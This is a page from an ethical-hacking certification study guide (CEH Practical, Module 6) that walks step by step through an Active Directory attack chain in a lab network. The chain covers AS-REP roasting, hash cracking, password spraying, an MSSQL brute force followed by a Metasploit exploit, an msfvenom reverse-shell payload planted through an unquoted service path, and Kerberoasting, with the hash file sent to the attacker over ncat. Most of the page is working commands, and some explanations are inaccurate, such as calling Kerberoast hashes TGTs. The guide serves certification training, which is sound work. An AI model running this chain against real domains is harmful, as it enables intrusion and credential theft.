CEH Practical Guide
  • Certified Ethical Hacker (CEH v12 and CEH V13) Practical Guide: Complete Study Resources & Tips
  • Module 2. Footprinting and Reconnaissance
    • 1. Footprinting through Search Engines
    • 2. Perform Footprinting Through Internet Research Services
    • 3. Footprinting through Social Networking sites
    • 4. Website Footprinting
    • 5. WHOIS Footprinting
    • 6. DNS Footprinting
    • 7. Network footprinting
    • 8. Email Footprinting
    • 9. Footprinting using footprinting tools
    • 10. Perform Footprinting using AI
  • Module 3. Scanning Networks
    • 1. Host Discovery
    • 2. Port and Service Discovery
    • 3. Perform OS Discovery
    • 4. Scan beyond Firewalls and IDS
    • 5. Network scanning using various tools
    • 6. Perform Network Scanning using AI
  • Module 4. Enumeration
    • 1. Netbios Enumeration (Port 137)
    • 2. SNMP Enumeration (Port 161,162)
    • 3. LDAP Enumeration (Port 389)
    • 4. NFS Enumeration
    • 5. DNS Enumeration
    • 6. SMTP Enumeration
    • 7. RPC, SMB and FTP Enumeration
    • 8. Enumeration using various tools
    • 9. Perform Enumeration using AI
  • Module 5. Vulnerability Assessment
    • 1. Perform Vulnerability Research with Vulnerability Scoring Systems and Databases
    • 2. Perform Vulnerability Assessment using Various Vulnerability Assessment Tools
    • 3. Perform Vulnerability Analysis using AI
  • Module 6. System Hacking
    • 1. Gain access to the system
    • 2. Privilege Escalation
    • 3. Maintain Remote Access and Hide Malicious Activities
    • 4. Clear Logs to hide the Evidence of Compromise
    • 5. Active Directory (AD) Attacks
  • Module 7. Malware Threats
    • 1. Gain access to systems with Trojans
    • 2. Infect the system using Virus
    • 3. Perform Static Malware Analysis
    • 4. Perform Dynamic Malware Analysis
  • Module 8. Sniffing
    • 1. Perform Active Sniffing
    • 2. Perform Network Sniffing using Various Sniffing Tools
    • 3. Detect Network Sniffing
  • Module 9. Social Engineering
    • 1. Perform Social Engineering using tools
    • 2. Detect a Phishing attack
    • 3. Audit Organization security for phishing attacks
    • 4. Social Engineering using AI
  • Module 10. Denial of Service
    • 1. Perform DOS and DDOS with various techniques
    • 2. Detect and Protect DOS and DDOS attacks
  • Module 11. Session Hijacking
    • 1. Perform Session Hijacking
    • 2. Detect Session Hijacking
  • Module 12. Evading IDS, antivirus and Honeypots
    • 1. Intrusion Detection using various tools
    • 2. Evade Firewall using Evasion Techniques
  • Module 13. Hacking Web Servers
    • 1. Footprint the Webserver
    • 2. Perform Webserver attacks
    • 3. Perform a Web Server Hacking using AI
  • Module 14. Hacking Web Applications
    • 1. Footprint the Web Infrastructure
    • 2. Perform Web applications Attacks
    • 3. Detect Web Vulnerabilities using using web application security tools
    • 4. Perform Web Application Hacking using AI
  • Module 15. SQL Injection
    • 1. Perform SQL Injection attacks
    • 2. Detect SQL Vulnerabilities using different tool
    • 3. Perform SQL Injection using AI
  • Module 16. Hacking Wireless Networks
    • 1. Footprint a wireless Network
    • 2. Perform Wireless Traffic Analysis
    • 3. Perform Wireless Attacks
  • Module 17. Hacking Mobile Platforms
    • 1. Hack Android Devices
    • 2. Secure Android Device
  • Module 18. IoT and OT Hacking
    • 1. Footprinting IoT and OT devices
    • 2. Capture and Analyze IoT traffic
    • 3. Perform IoT Attacks
  • Module 19. Cloud Computing
    • 1. Perform Reconnaissance on Azure
    • 2. S3 Bucket Enumeration
    • 3. Exploit S3 buckets
    • 4. Perform Privilege Escalation to Gain Higher Privileges
    • 5. Perform Vulnerability Assessment on Docker Images
  • Module 20. Cryptography
    • 1. Encrypt the Information using Various Cryptography Tools
    • 2. Create a self signed Certificate
    • 3. Perform Disk Encryption
    • 4. Cryptanalysis Using different tools
    • 5. Perform Cryptography using AI
  • Tips for exams
  • Additional Resources
Powered by GitBook
On this page
  • Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name
  • Task 2: Perform AS-REP Roasting Attack
  • Task 3: Spray Cracked Password into Network using CrackMapExec.
  • Task 4: Perform Post-Enumeration using PowerView
  • Task 5: Perform Attack on MSSQL service
  • Task 6: Perform Privilege Escalation
  • Task 7: Perform Kerberoasting Attack

Was this helpful?

  1. Module 6. System Hacking

5. Active Directory (AD) Attacks

The module has recently been added in CEH V13 Practical

Previous4. Clear Logs to hide the Evidence of CompromiseNextModule 7. Malware Threats

Last updated 7 months ago

Was this helpful?

Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name

The initial scan in AD enumeration is crucial as it identifies the network structure, open ports, and services. This information helps ethical hackers map the AD environment, uncover vulnerabilities, and plan targeted attacks to assess security measures and identify potential weaknesses.

nmap 10.10.1.0/24

Port 88/TCP kerberos-sec and port 389/TCP LDAP opened which confirms that our DC IP address is 10.10.1.22

Detailed scan

nmap -A -sC -sV 10.10.1.22

We get the domain name and FQDN.

Task 2: Perform AS-REP Roasting Attack

An AS-REP roasting attack targets user accounts in AD that do not require Kerberos pre-authentication, exploiting the DONT_REQ_PREAUTH setting. Attackers can request a ticket-granting ticket (TGT) for these accounts without needing the user's password.

The DC responds with an encrypted TGT, which the attacker captures. This TGT, encrypted with the user's password hash, is then subjected to offline password-cracking tools such as Hashcat or John the Ripper. By rapidly guessing the password, the attacker can eventually decrypt the TGT, revealing the user's password.

python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22.
  • GetNPUsers.py: Python script to retrieve AD user information.

  • CEH.com/: Target AD domain.

  • -no-pass: Flag to find user accounts not requiring pre-authentication.

  • -usersfile ~/ADtools/users.txt: Path to the file with the user account list.

  • -dc-ip 10.10.1.22: IP address of the DC to query.

In Kali, we can use the following command as well

impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt  htb.local/
impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/

We can observe that the user Joshua has DONT_REQUIRE_PREAUTH set. As this user is vulnerable to AS-REP roasting, we obtain Joshua's password hash. Copy that hash and save it as joshuahash.txt. Execute the command echo '[HASH]' > joshuahash.txt.

Now crack the hash.

john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt

Task 3: Spray Cracked Password into Network using CrackMapExec.

Using CrackMapExec for password spraying involves leveraging its capabilities to automate the process. For instance, if "cupcake" is a cracked password, CME can be used to test this password against numerous user accounts and services across a network. This approach helps identify other accounts that may be using the same password, facilitating further penetration testing or security assessments.

You can spray the password as per the Nmap scan results on services which are running on our target.

RDP Password spraying

cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p “cupcake”
  • rdp: Targets the Remote Desktop Protocol (RDP) service.

  • 10.10.1.0/24: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0.

  • -u /root/ADtools/users.txt: Specifies the path to the file containing user accounts for authentication.

  • -p "cupcake": Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts.

We find that user Mark is using the same password cupcake on host 10.10.1.40. We can try to connect to RDP as user mark.

Task 4: Perform Post-Enumeration using PowerView

PowerView is a PowerShell tool designed for network and AD enumeration. It helps security professionals gather detailed information about user accounts, groups, computers, and domain trusts. PowerView is used to identify potential security weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations. It works from Windows.

Launch PowerShell by searching for it in Windows search option. Now, execute the command . .\PowerView.ps1 to load the PowerView.ps1 script in PowerShell. (You should have downloaded the script)

powershell -EP Bypass

First we need to bypass antivirus protection and then we can run the script.

Import-Module .\PowerView.ps1

Execute Get-NetComputer command in PowerShell. This command will display all the information related to computers in AD. It lists all computer objects in AD, which can help in identifying network targets and mapping the AD environment.

Get-NetComputer

Execute Get-NetGroup in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation.

Get-NetGroup

Execute command Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better.

Get-NetUser

We found a new user SQL_srv, who has some high privileges and could be useful for further attacks.

Here are some other listed commands that you can use with PowerView.ps1 for enumeration:

  • Get-NetOU - Lists all organizational units (OUs) in the domain.

  • Get-NetSession - Lists active sessions on the domain.

  • Get-NetLoggedon - Lists users currently logged on to machines.

  • Get-NetProcess - Lists processes running on domain machines.

  • Get-NetService - Lists services on domain machines.

  • Get-NetDomainTrust - Lists domain trust relationships.

  • Get-ObjectACL - Retrieves ACLs for a specified object.

  • Find-InterestingDomainAcl - Finds interesting ACLs in the domain.

  • Get-NetSPN - Lists service principal names (SPNs) in the domain.

  • Invoke-ShareFinder - Finds shared folders in the domain.

  • Invoke-UserHunter - Finds where domain admins are logged in.

  • Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines.

Task 5: Perform Attack on MSSQL service

xp_cmdshell is a SQL server stored procedure enabling command shell execution. Misconfigured xp_cmdshell can lead to arbitrary command execution, data exfiltration, and potential network compromise, posing significant security risks. Proper configuration and security measures are crucial to mitigate these risks.

The service runs on port 1433 and we will brute force the password first.

Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt.

Now, bruteforce the password for MSSQL

hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql

We have successfully cracked the password for SQL_srv, which is "batman". Next, we will attempt to log into the service using mssqlclient.py.

python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:[email protected] -port 1433

Now, execute the following command.

SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';

Now, as we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service.

use exploit/windows/mssql/mssql_payload
set RHOST 10.10.1.30
set USERNAME SQL_srv
set PASSWORD batman
set DATABASE master

Once the exploitation is complete, we will be getting a Meterpreter session. You can move to shell by typing shell.

Task 6: Perform Privilege Escalation

WinPEASx64.exe is a tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation.

The Unquoted Service Path vulnerability in the RunOnce registry key arises when a Windows service path lacks proper quotation marks and contains spaces, enabling attackers to execute arbitrary code with elevated privileges during system startup.

It is assumed that you still have the shell from last task.

Move to C:\Users\Public\Downloads using cd and execute the command powershell.

Now, we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type sudo su, press Enter, and use toor as password. Execute the command cd /root/ADtools.

Type python3 -m http.server and press Enter to host the winPEASx64.exe file.

Get back to the shell terminal and type

wget http://10.10.1.13:8000/winPEASx64.exe -o winpeas.exe

Once winpeas.exe is downloaded, execute it with ./winpeas.exe

./winpeas.exe

Once the execution is completed, observe the output. Here, we have a file named file.exe in C:\Program Files\CEH Services that is unquoted and can be exploited for privilege escalation.

Open a new terminal with root privileges using the command sudo su and toor as password and create a payload.

msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe > /root/ADtools/file.exe

Go to another terminal and type nc -nvlp 8888 and press Enter

nc -nvlp 8888

Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command

cd ../../.. ; cd "Program Files/CEH Services"

Execute the command.

move file.exe file.bak ; wget http://10.10.1.13:8000/file.exe -o file.exe

Switch to the Windows Server 2019 (AD) machine, assuming we are the victim now. Restart the machine by hovering over Power and Display button and click Reset/Reboot button present at the toolbar located above the virtual machine and log in with the username SQL_srv and password "batman." We will get a shell on our Parrot OS.

Task 7: Perform Kerberoasting Attack

Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication.

We assume that we already have a shell on a windows system meaning access to AD environment.

In the netcat shell, execute the powershell command to launch PowerShell. Navigate to C:\Users\Public\Downloads and execute the command cd ../.. ; cd Users\Public\Downloads

cd ../.. ; cd Users\Public\Downloads

Now, we will be downloading Rubeus and netcat. Execute the command

wget http://10.10.1.13:8000/Rubeus.exe -o rubeus.exe ; wget http://10.10.1.13:8000/ncat.exe -o ncat.exe

Type cd ../.. && cd Users\Public\Downloads and press Enter to move into the Downloads folder

Execute the command

rubeus.exe kerberoast /outfile:hash.txt

After kerberoasting the password hash for DC-Admin is saved in hash.txt file

To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type sudo su and press Enter; use toor as password. Then execute the command

nc -lvp 9999 > hash.txt

In the shell terminal, execute the command.

ncat.exe -w 3 10.10.1.13 9999 < hash.txt

Get back to the netcat listener terminal and press Enter to save the file.

Now, we will be using HashCat to crack the password hash

hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt
  • -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes.

  • --force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results.

  • -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is.

  • hash.txt: is the input file containing the hashes to crack

  • /root/ADtools/rockyou.txt: is the wordlist file used for the attack

After completation, we get the password advanced!. As DC-Admin has high privileges on the domain, we can use this password for further attacks.

Certified Ethical Hacker (CEHv12) Practical hands on LabsUdemy
CEH Practical Guide
Logo
A value of 1, indicating that xp_cmdshell is enabled on the server